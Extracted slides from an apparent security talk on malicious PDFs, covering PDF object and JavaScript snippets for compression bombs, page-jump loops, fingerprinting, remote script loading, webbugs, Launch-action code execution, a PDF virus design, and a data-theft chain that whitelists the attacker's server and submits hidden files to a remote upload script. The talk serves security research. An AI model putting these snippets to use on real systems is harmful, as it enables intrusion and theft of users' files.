PDF 101 The PDF way of security Thinking malicious PDF Darth Origami: dark side of PDF Last words

Evasion tricks Denial of Service Information leakage Dropping eggs Code execution

Roadmap
1

PDF 101 The PDF way of security Thinking malicious PDF Evasion tricks Denial of Service Information leakage Dropping eggs Code execution Darth Origami: dark side of PDF Last words
Malicious origami in PDF 63/116

F. Raynal & G. Delugr (Sogeti/ESEC) e

PDF 101 The PDF way of security Thinking malicious PDF Darth Origami: dark side of PDF Last words

Evasion tricks Denial of Service Information leakage Dropping eggs Code execution

Bombing PDF

zip bomb Streams can be compressed (zlib) What happens when many many many 0s are compressed? ;-)
4 0 obj << /Filter /FlateDecode /Length 486003 >> stream ... endstream endobj

F. Raynal & G. Delugr (Sogeti/ESEC) e

Malicious origami in PDF

65/116

PDF 101 The PDF way of security Thinking malicious PDF Darth Origami: dark side of PDF Last words

Evasion tricks Denial of Service Information leakage Dropping eggs Code execution

Killing PDF with Named

Moebius: going next page Action Named used to put label and jump to them across documents Some label/destination are predened
/AA << /O << /S /Named /N /NextPage >> >> % % % % Pages object Additional Action When the page is Open Perform an action of type Named Actions Name is NextPage

F. Raynal & G. Delugr (Sogeti/ESEC) e

Malicious origami in PDF

67/116

PDF 101 The PDF way of security Thinking malicious PDF Darth Origami: dark side of PDF Last words

Evasion tricks Denial of Service Information leakage Dropping eggs Code execution

Killing PDF with GoTo

Moebius: jumping around Action GoTo changes the view to the specied destination Destination is either inside the doc, embedded in the doc (GoToE) or remote (GoToR) Variant: randomize the jumps
1656 0 obj << /AA << /O << /S /GoTo /D [1 0 R /Fit ] >> >>

% % % % %

Pages object Additional Action When the page is Open Perform an action of type GoTo Destination is object 1 with its content magnified to fit the window

F. Raynal & G. Delugr (Sogeti/ESEC) e

Malicious origami in PDF

69/116

PDF 101 The PDF way of security Thinking malicious PDF Darth Origami: dark side of PDF Last words

Evasion tricks Denial of Service Information leakage Dropping eggs Code execution

Killing PDFs with GoToR

Moebius: going next document Action GoToR sets the view to another document Can be opened in a new window
/AA << /O << /S /GoToR /F (moebius-gotor-2.pdf) /D [0 /Fit ] /NewWindow false >> >> /AA << /O << /S /GoToR /F (moebius-gotor-1.pdf) /D [0 /Fit ] /NewWindow false >> >>

F. Raynal & G. Delugr (Sogeti/ESEC) e

Malicious origami in PDF

71/116

PDF 101 The PDF way of security Thinking malicious PDF Darth Origami: dark side of PDF Last words

Evasion tricks Denial of Service Information leakage Dropping eggs Code execution

Roadmap
1

PDF 101 The PDF way of security Thinking malicious PDF Evasion tricks Denial of Service Information leakage Dropping eggs Code execution Darth Origami: dark side of PDF Last words
Malicious origami in PDF 72/116

F. Raynal & G. Delugr (Sogeti/ESEC) e

PDF 101 The PDF way of security Thinking malicious PDF Darth Origami: dark side of PDF Last words

Evasion tricks Denial of Service Information leakage Dropping eggs Code execution

Hide and seek

Hiding text . . . or not Every viewed item is a PDF object These objects can be manipulated . . . or removed Or simply copy/paste . . . As long as the PDF is not encrypted, there is no way to prevent reading Calipari 4 March 2005: one Italian secret agent is killed in Iraq by US soldiers Later, an unclassied report was released: many text and names are hidden . . . ;-)

F. Raynal & G. Delugr (Sogeti/ESEC) e

Malicious origami in PDF

73/116

PDF 101 The PDF way of security Thinking malicious PDF Darth Origami: dark side of PDF Last words

Evasion tricks Denial of Service Information leakage Dropping eggs Code execution

Incremental PDF
Fi
Header

Back into past: revisions Not so long ago, MS Oce used incremental saves
Easy to rebuild the previous version of a doc

Body 0 Cross Ref. 0

Nowadays, PDF documents work the same (sigh) Do not update PDF les to conceal sensitive information

Trailer 0
Body 1 Cross Ref. 1

Trailer 1

F. Raynal & G. Delugr (Sogeti/ESEC) e

Malicious origami in PDF

74/116

PDF 101 The PDF way of security Thinking malicious PDF Darth Origami: dark side of PDF Last words

Evasion tricks Denial of Service Information leakage Dropping eggs Code execution

What information to leak?

Help me JavaScript, you are my only hope!
AddKeyValuePair("platform", app.platform); AddKeyValuePair("formsversion", app.formsVersion); AddKeyValuePair("language", app.language); AddKeyValuePair("viewerType", app.viewerType); AddKeyValuePair("viewerVariation", app.viewerVariation); AddKeyValuePair("viewerVersion", app.viewerVersion); AddKeyValuePair("url", this.URL); AddKeyValuePair("external", this.external);

F. Raynal & G. Delugr (Sogeti/ESEC) e

Malicious origami in PDF

76/116

PDF 101 The PDF way of security Thinking malicious PDF Darth Origami: dark side of PDF Last words

Evasion tricks Denial of Service Information leakage Dropping eggs Code execution

What information to leak?

Help me JavaScript, you are my only hope!
for (var i = 0; i < plugins.length; i++) AddKeyValuePair("plugin" + (i+1) + "name", plugins[i].name); AddKeyValuePair("plugin" + (i+1) + "version", plugins[i].version); AddKeyValuePair("plugin" + (i+1) + "certified", plugins[i].certified); AddKeyValuePair("plugin" + (i+1) + "loaded", plugins[i].loaded);

F. Raynal & G. Delugr (Sogeti/ESEC) e

Malicious origami in PDF

76/116

PDF 101 The PDF way of security Thinking malicious PDF Darth Origami: dark side of PDF Last words

Evasion tricks Denial of Service Information leakage Dropping eggs Code execution

What information to leak?

Help me JavaScript, you are my only hope!

var pn = app.printerNames;

F. Raynal & G. Delugr (Sogeti/ESEC) e

Malicious origami in PDF

76/116

PDF 101 The PDF way of security Thinking malicious PDF Darth Origami: dark side of PDF Last words

Evasion tricks Denial of Service Information leakage Dropping eggs Code execution

What to leak? External streams

PDF mantra All content in a PDF had to be contained inside the single PDF le At most, a PDF le can access only PDF/FDF les But starting from PDF 1.2, raw data of streams can be outside the PDF le. . . Initially for images, sounds, videos . . . but works for all streams (yes, also JavaScript programs :)

F. Raynal & G. Delugr (Sogeti/ESEC) e

Malicious origami in PDF

77/116

PDF 101 The PDF way of security Thinking malicious PDF Darth Origami: dark side of PDF Last words

Evasion tricks Denial of Service Information leakage Dropping eggs Code execution

What to leak? External streams

Breaking mantra Preview, Foxit, poppler: nothing happens Adobe Reader 7, 8: o by default, enabled through Trust manager Adobe Reader 9: option no more available
6 0 obj << /Length 0 /F << /FS /URL /F (http://seclabs.org/fred/script.js) >> >>stream endstream endobj

4 0 obj << /S /JavaScript /JS 6 0 R >> endobj

F. Raynal & G. Delugr (Sogeti/ESEC) e

Malicious origami in PDF

79/116

PDF 101 The PDF way of security Thinking malicious PDF Darth Origami: dark side of PDF Last words

Evasion tricks Denial of Service Information leakage Dropping eggs Code execution

External streams: the revenge of the real life

Breaking mantra. . . again: accessing any kind of document Dene many embedded le attachments, each stream content being external Use JavaScript to:
Access (open/read) each embedded le Submit each embedded le through an invisible form
1 0 obj << /Type /Catalog /Names << /JavaScript 2 0 R /EmbeddedFiles 6 0 R >> >> endobj 6 0 obj << /EF << /F 9 0 R >> /F (secret.doc) /Type /Filespec >> 9 0 obj << /Length 0 /F (secret.doc) >>

// JavaScript to read, and transform any kind of file var stream = this.getDataObjectContents("secret.doc"); var data = util.stringFromStream(stream, "utf-8");
F. Raynal & G. Delugr (Sogeti/ESEC) e Malicious origami in PDF 81/116

PDF 101 The PDF way of security Thinking malicious PDF Darth Origami: dark side of PDF Last words

Evasion tricks Denial of Service Information leakage Dropping eggs Code execution

Webbug: when Reader interacts with your browser

Webbug: make your browser go to the Internet poppler, preview: nothing happens Adobe Reader: a pop-up asking is the connection is allowed Foxit: no pop-up, connection is made . . .
1 0 obj << /Type /Catalog /OpenAction << % When document is open /S /URI % Actions type is to resolve an URI /URI (http://seclabs.org/fred/webbug-browser.html) >> /Pages 2 0 R >>

F. Raynal & G. Delugr (Sogeti/ESEC) e

Malicious origami in PDF

83/116

PDF 101 The PDF way of security Thinking malicious PDF Darth Origami: dark side of PDF Last words

Evasion tricks Denial of Service Information leakage Dropping eggs Code execution

Webbug: when Reader interacts with your browser. . . again

Webbug: make your browser go to the Internet. . . again Add a JavaScript in the Names dictionary: it is automatically run when the document is open Results are the same as with URI Remember about polymorphism: it is also semantically true
2 0 obj << /Names [(Update) 4 0 R ] >> 4 0 obj << /JS (app.launchURL( "http://seclabs.org/fred/webbug-reader.php")) /S /JavaScript >> endobj
Malicious origami in PDF 85/116

1 0 obj << /Pages 3 0 R /Names << /JavaScript 2 0 R >> /Type /Catalog >>

F. Raynal & G. Delugr (Sogeti/ESEC) e

PDF 101 The PDF way of security Thinking malicious PDF Darth Origami: dark side of PDF Last words

Evasion tricks Denial of Service Information leakage Dropping eggs Code execution

Webbug and whitelist

Reader security model If this site is allowed, no more alert will ever be raised
# :~/.adobe/Acrobat/8.0/Preferences/reader_prefs /TrustManager [/c << /DefaultLaunchURLPerms [/c << /HostPerms [/t (version:1|seclabs.org:2)] >>]>>]

F. Raynal & G. Delugr (Sogeti/ESEC) e

Malicious origami in PDF

87/116

PDF 101 The PDF way of security Thinking malicious PDF Darth Origami: dark side of PDF Last words

Evasion tricks Denial of Service Information leakage Dropping eggs Code execution

A few words about PDF forms

Forms in PDF (what for???) Adobe Reader comes with an embedded browser It is used to handle forms. . . 4 kinds of elds: Button, Text, Choice, Signature 4 actions are available through PDF forms: Submit, Reset, ImportData, JavaScript Forms in PDF are the same as forms on the web
(except it is described with PDF objects)

Question: how the reader is able to submit a form? FDF: Forms Data Format Very similar to PDF, but simpler Allow forms initialisation, data exchange, . . .
F. Raynal & G. Delugr (Sogeti/ESEC) e Malicious origami in PDF 88/116

PDF 101 The PDF way of security Thinking malicious PDF Darth Origami: dark side of PDF Last words

Evasion tricks Denial of Service Information leakage Dropping eggs Code execution

Webbug: when Reader calls home

Webbug: using the Readers embedded browser Create a form, submitted as soon as the document is open The server answers with another PDF document (e.g.) Reader handles this new document poppler, preview, Foxit: nothing happens Adobe Reader: pop-up but the new document is handled
1 0 obj << /OpenAction << % When document is open /S /SubmitForm % Perform a SubmitForm action /F << % Connecting to this site /F (http://seclabs.org/fred/webbug-reader.php) /FS /URL >> /Fields [] % Passing these arguments /Flags 12 % Using a HTTP GET method >> /Pages 2 0 R /Type /Catalog >>

F. Raynal & G. Delugr (Sogeti/ESEC) e

Malicious origami in PDF

90/116

PDF 101 The PDF way of security Thinking malicious PDF Darth Origami: dark side of PDF Last words

Evasion tricks Denial of Service Information leakage Dropping eggs Code execution

Comparing Webbug

Adobe Reader ways to handle network connections When related to URL (\URI, app.LaunchURL): outsourced webbugs
execve("/usr/bin/firefox", ["firefox", "-remote", "openURL(http://seclabs.org/fred/webbug-reader.php,new-tab)"], [/* 45 vars */]) = 0

When related to forms (\SubmitForm, this.submitForm): inside network capabilities

F. Raynal & G. Delugr (Sogeti/ESEC) e

Malicious origami in PDF

92/116

PDF 101 The PDF way of security Thinking malicious PDF Darth Origami: dark side of PDF Last words

Evasion tricks Denial of Service Information leakage Dropping eggs Code execution

Comparing Webbug
Adobe Reader ways to handle network connections When related to URL (\URI, app.LaunchURL): outsourced webbugs When related to forms (\SubmitForm, this.submitForm): inside network capabilities
# Get IP address socket(PF_INET, SOCK_DGRAM, IPPROTO_IP) = 29 connect(29, sa_family=AF_INET,sin_port=53,sin_addr=inet_addr("10.42.42.1")) = 0 recvfrom(29, ...) = 45 # Connect to the server socket(PF_INET, SOCK_STREAM, IPPROTO_TCP) = 29 connect(29, sa_family=AF_INET, sin_port=80, sin_addr=inet_addr("..."), 16) send(29, "GET /fred/webbug-reader.php HTTP/1.1\r\n User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050524 Fedora/1.0.4-4 Firefox/ 1.0.4\r\n Host: seclabs.org\r\n Accept: */*\r\n\r\n"..., 179, 0) = 179 recv(29, "HTTP/1.1 200 OK\r\n...) = 1448

F. Raynal & G. Delugr (Sogeti/ESEC) e

Malicious origami in PDF

92/116

PDF 101 The PDF way of security Thinking malicious PDF Darth Origami: dark side of PDF Last words

Evasion tricks Denial of Service Information leakage Dropping eggs Code execution

Comparing Webbug

Adobe Reader ways to handle network connections When related to URL (\URI, app.LaunchURL): outsourced webbugs When related to forms (\SubmitForm, this.submitForm): inside network capabilities Browser vulnerabilities: Firefox/1.0.4 Old browser banner: are all xes backported? http://www.mozilla.org/security/known-vulnerabilities/

F. Raynal & G. Delugr (Sogeti/ESEC) e

Malicious origami in PDF

92/116

PDF 101 The PDF way of security Thinking malicious PDF Darth Origami: dark side of PDF Last words

Evasion tricks Denial of Service Information leakage Dropping eggs Code execution

Roadmap
1

PDF 101 The PDF way of security Thinking malicious PDF Evasion tricks Denial of Service Information leakage Dropping eggs Code execution Darth Origami: dark side of PDF Last words
Malicious origami in PDF 93/116

F. Raynal & G. Delugr (Sogeti/ESEC) e

PDF 101 The PDF way of security Thinking malicious PDF Darth Origami: dark side of PDF Last words

Evasion tricks Denial of Service Information leakage Dropping eggs Code execution

Embedded les

Dropping attachments When launched, attachments are saved in a temp folder Remember: ltering is based on le extension . . . . . . and PDF/FDF extensions are whitelisted by default A malicious .pdf le can then be written to disk, whatever its real nature But
We cannot decide where it is exactly written Reader erases its temp folder upon application shutdown

F. Raynal & G. Delugr (Sogeti/ESEC) e

Malicious origami in PDF

94/116

PDF 101 The PDF way of security Thinking malicious PDF Darth Origami: dark side of PDF Last words

Evasion tricks Denial of Service Information leakage Dropping eggs Code execution

Multimedia session

Downloading videos Clips and music can be read from a PDF document Multimedia content may be downloaded from a remote server Transferred data is saved into local player cache Playing an embedded le An embedded video/sound le can be played in a document The attachment is dropped into the user temp folder when playing A hidden player can play a le with null volume

F. Raynal & G. Delugr (Sogeti/ESEC) e

Malicious origami in PDF

95/116

PDF 101 The PDF way of security Thinking malicious PDF Darth Origami: dark side of PDF Last words

Evasion tricks Denial of Service Information leakage Dropping eggs Code execution

Roadmap
1

PDF 101 The PDF way of security Thinking malicious PDF Evasion tricks Denial of Service Information leakage Dropping eggs Code execution Darth Origami: dark side of PDF Last words
Malicious origami in PDF 96/116

F. Raynal & G. Delugr (Sogeti/ESEC) e

PDF 101 The PDF way of security Thinking malicious PDF Darth Origami: dark side of PDF Last words

Evasion tricks Denial of Service Information leakage Dropping eggs Code execution

Code execution
Launch action This action can launch an application on the host system Parameters can be passed to the command line Can run dierent commands depending on the OS User is warned through a popup PDF code Launch the system calculator
/OpenAction << /S /Launch /F << /DOS (C:\WINDOWS\system32\calc.exe) /Unix (/usr/bin/xcalc) /Mac (/Applications/Calculator.app) >> >>

F. Raynal & G. Delugr (Sogeti/ESEC) e

Malicious origami in PDF

98/116

PDF 101 The PDF way of security Thinking malicious PDF Darth Origami: dark side of PDF Last words

Evasion tricks Denial of Service Information leakage Dropping eggs Code execution

Code execution
File attachments Embedded les can be executed
Using an attachment annotation Using JavaScript exportDataObject method

Bypassing the lename extension lter Foxit/Adobe Reader 8: JAR extension has not been blacklisted Adobe Reader 9: a aw in the path lter permits to bypass blacklist checking More generally, a lename extension cannot represent the real nature of the le Conclusion: lename blacklisting is no security

F. Raynal & G. Delugr (Sogeti/ESEC) e

Malicious origami in PDF

99/116

PDF 101 The PDF way of security Thinking malicious PDF Darth Origami: dark side of PDF Last words

Origami #1: PDF based virus Origami #2: multi-stages targeted operation

Roadmap

PDF 101 The PDF way of security Thinking malicious PDF Darth Origami: dark side of PDF Origami #1: PDF based virus Origami #2: multi-stages targeted operation Last words

F. Raynal & G. Delugr (Sogeti/ESEC) e

Malicious origami in PDF

100/116

PDF 101 The PDF way of security Thinking malicious PDF Darth Origami: dark side of PDF Last words

Origami #1: PDF based virus Origami #2: multi-stages targeted operation

Roadmap

PDF 101 The PDF way of security Thinking malicious PDF Darth Origami: dark side of PDF Origami #1: PDF based virus Origami #2: multi-stages targeted operation Last words

F. Raynal & G. Delugr (Sogeti/ESEC) e

Malicious origami in PDF

101/116

PDF 101 The PDF way of security Thinking malicious PDF Darth Origami: dark side of PDF Last words

Origami #1: PDF based virus Origami #2: multi-stages targeted operation

Bad idea #1: PDF virus

PDF virus PoC Create malicious PDF les based on features

Embed a malicious le attachment Sign the PDF les with Adobes private key Enable Usage Rights, especially Save Right

Initial infection: distribute the malicious PDFs, corrupts others Propagation: each time Reader is run, a JavaScript in run (privileged context), and can open malicious PDF in a hidden window

F. Raynal & G. Delugr (Sogeti/ESEC) e

Malicious origami in PDF

102/116

PDF 101 The PDF way of security Thinking malicious PDF Darth Origami: dark side of PDF Last words

Origami #1: PDF based virus Origami #2: multi-stages targeted operation

Bad idea #1: PDF virus

PDF virus PoC Create malicious PDF les based on features Initial infection: distribute the malicious PDFs, corrupts others
Ex.: fake resume sent to companies, software documentations, newspapers articles, PDF books, . . . If an host is already infected, privileged functions are automatically accessible Otherwise wait for a stupid end-user to let the attachment go. . . The conguration is then corrupted
Allow connections to a master site Add a new JavaScript run at start-up of Adobe Reader

PDF les on the victim system are also infected and polymorphed

Propagation: each time Reader is run, a JavaScript in run (privileged context), and can open malicious PDF in a hidden window

F. Raynal & G. Delugr (Sogeti/ESEC) e

Malicious origami in PDF

102/116

PDF 101 The PDF way of security Thinking malicious PDF Darth Origami: dark side of PDF Last words

Origami #1: PDF based virus Origami #2: multi-stages targeted operation

Bad idea #1: PDF virus

PDF virus PoC Create malicious PDF les based on features Initial infection: distribute the malicious PDFs, corrupts others Propagation: each time Reader is run, a JavaScript in run (privileged context), and can open malicious PDF in a hidden window
Check whether the Reader is already corrupted (and try to infect the system if needed) Check whether the PDF is already corrupted (and infect it otherwise) Connect to a master site, and may download a PDF virus update if needed

F. Raynal & G. Delugr (Sogeti/ESEC) e

Malicious origami in PDF

102/116

PDF 101 The PDF way of security Thinking malicious PDF Darth Origami: dark side of PDF Last words

Origami #1: PDF based virus Origami #2: multi-stages targeted operation

Roadmap

PDF 101 The PDF way of security Thinking malicious PDF Darth Origami: dark side of PDF Origami #1: PDF based virus Origami #2: multi-stages targeted operation Last words

F. Raynal & G. Delugr (Sogeti/ESEC) e

Malicious origami in PDF

103/116

PDF 101 The PDF way of security Thinking malicious PDF Darth Origami: dark side of PDF Last words

Origami #1: PDF based virus Origami #2: multi-stages targeted operation

Attackers security issues

Before starting PDF are natural in any system and network environments PDF are naturally well suited to bypass detection PDF are a good communication way Constraint The attack must require no privilege others than standard user

F. Raynal & G. Delugr (Sogeti/ESEC) e

Malicious origami in PDF

104/116

PDF 101 The PDF way of security Thinking malicious PDF Darth Origami: dark side of PDF Last words

Origami #1: PDF based virus Origami #2: multi-stages targeted operation

Targeted attack: 2 stages to steal data

Data theft in PDF Contaminate the target: send a poisoned PDF
Contain an embedded le executed when the doc is opened
E.g. social engineering to look like an update of the Reader Provide a Adobes signed PDF to abuse trust

The embedded binary prepare the les to export

All les to export are copied into a hidden directory When copied, it is embedded in a minimalist FDF le A list of all the les is created in FDF, with a /F pointing to the C&C site

Corrupt the conguration

Add the attackers C&C site to the whitelist Add a JavaScript in the users directory: next time a PDF is opened, the list is opened (hidden) too, and submitted to the C&C site The JavaScript disables itself using a global variable

Data theft: exporting the precious les

F. Raynal & G. Delugr (Sogeti/ESEC) e Malicious origami in PDF 105/116

PDF 101 The PDF way of security Thinking malicious PDF Darth Origami: dark side of PDF Last words

Origami #1: PDF based virus Origami #2: multi-stages targeted operation

Targeted attack: 2 stages to steal data

Data theft in PDF Contaminate the target: send a poisoned PDF Data theft: exporting the precious les
The attacker builds a PDF with both an ImportData + SubmitForm The PDF is sent to the target: attacker just have to wait for the target to open the malicious PDF

F. Raynal & G. Delugr (Sogeti/ESEC) e

Malicious origami in PDF

105/116

PDF 101 The PDF way of security Thinking malicious PDF Darth Origami: dark side of PDF Last words

Origami #1: PDF based virus Origami #2: multi-stages targeted operation

Stage 1 : corrupting the Reader

Change targets conguration Enable share of JS global variables among documents
Save information across session / communication between malicious documents
JSPrefs/bEnableGlobalSecurity = 0

Whitelist attackers server hostname

So we can freely output information to an evil server
TrustManager/cDefaultLaunchURLPerms/tHostPerms = version:1|seclabs.org:2

Whitelist unknown attachment extensions

So we can easily re-infect the victim system
Attachments/cUserLaunchAttachmentPerms/iUnlistedAttachmentTypePerm = 2

Add attackers certicate into the local user store with full trusting privileges
Attackers certied documents can use privileged JavaScript
F. Raynal & G. Delugr (Sogeti/ESEC) e Malicious origami in PDF 107/116

PDF 101 The PDF way of security Thinking malicious PDF Darth Origami: dark side of PDF Last words

Origami #1: PDF based virus Origami #2: multi-stages targeted operation

Preparing data leakage

Generating FDF les FDF : close to PDF, designed to exchange data between Adobe applications A PDF can load a FDF to auto-ll form elds Targeted les shall then be converted into FDF so that they can be loaded and submitted with a PDF form
/FDF << /Fields [ <</T(fname)/V(secret.doc)>> <</T(pwd) /V(2489cc8dc38d546170c57f48c92ea1a6)>> <</T(content)/V(This is the most precious secret I have ...)>> ] /JavaScript << /Before (app.alert("FDF file loaded");) >> >> >>

F. Raynal & G. Delugr (Sogeti/ESEC) e

Malicious origami in PDF

109/116

PDF 101 The PDF way of security Thinking malicious PDF Darth Origami: dark side of PDF Last words

Origami #1: PDF based virus Origami #2: multi-stages targeted operation

Stage 2 : data theft

Automatic le extraction: ImportData + SubmitForm
1 0 obj << /OpenAction << /S /ImportData /F << /F (c:\\some\hidden\place\secret.fdf) /FS /FileSpec >> /Next << /S /SubmitForm /F << /F (http://seclabs.org/fred/pdf/upload.php) /FS /URL >> /Flags 4 /Fields [ 4 0 R 5 0 R 6 0 R 7 0 R ] >> >> >> endobj

F. Raynal & G. Delugr (Sogeti/ESEC) e

Malicious origami in PDF

111/116

PDF 101 The PDF way of security Thinking malicious PDF Darth Origami: dark side of PDF Last words

Origami #1: PDF based virus Origami #2: multi-stages targeted operation

Summary

A matter of version Able to sign PDFs with Adobes certicate With Adobe Reader 8:
Can read any le thanks to external stream Can run embedded jar les

With Adobe Reader 9:

Can read only PDF / FDF les (which are easy to create) Can run any kind of le thanks to a aw in the extension parser

Write access is still the most tedious to gain

F. Raynal & G. Delugr (Sogeti/ESEC) e

Malicious origami in PDF

112/116

PDF 101 The PDF way of security Thinking malicious PDF Darth Origami: dark side of PDF Last words

Roadmap

PDF 101 The PDF way of security Thinking malicious PDF Darth Origami: dark side of PDF Last words

F. Raynal & G. Delugr (Sogeti/ESEC) e

Malicious origami in PDF

113/116

PDF 101 The PDF way of security Thinking malicious PDF Darth Origami: dark side of PDF Last words

Conclusion
PDF, a new security risk? PDF is still considered harmless by most of people Malicious PDF are (almost) OS-independent A word about the readers Adobe Reader: each version has new (useful?) features. . .
Obvious security is well handled . . . even if too much security conguration is still at user level Blacklist security

Foxit: many features are supported. . . with no security at all Preview, poppler: minimalist viewers with few supported features

F. Raynal & G. Delugr (Sogeti/ESEC) e

Malicious origami in PDF

114/116

PDF 101 The PDF way of security Thinking malicious PDF Darth Origami: dark side of PDF Last words

Where to seek next?

Other ideas The JavaScript engine, with its undocumented functions The embedded browser, so oldish XFA forms Unclear conguration features (e.g. user rights) Embedding postscript programs Playing with multimedia and caches IE / Firefox plug-ins ...

F. Raynal & G. Delugr (Sogeti/ESEC) e

Malicious origami in PDF

115/116

PDF 101 The PDF way of security Thinking malicious PDF Darth Origami: dark side of PDF Last words

Q & (hopefully) A
Slides available for download (in PDF of course ;-): http://security-labs.org/fred/ Eric Filiol, my padawans at Sogeti/ESEC, my boss at Sogeti/ESEC, Pierre-Marc Bureau and Master Yoda Special THANKS to the translators team, Tomoyuki Sakurai and David Thiel for the japanese version of these slides

F. Raynal & G. Delugr (Sogeti/ESEC) e

Malicious origami in PDF

116/116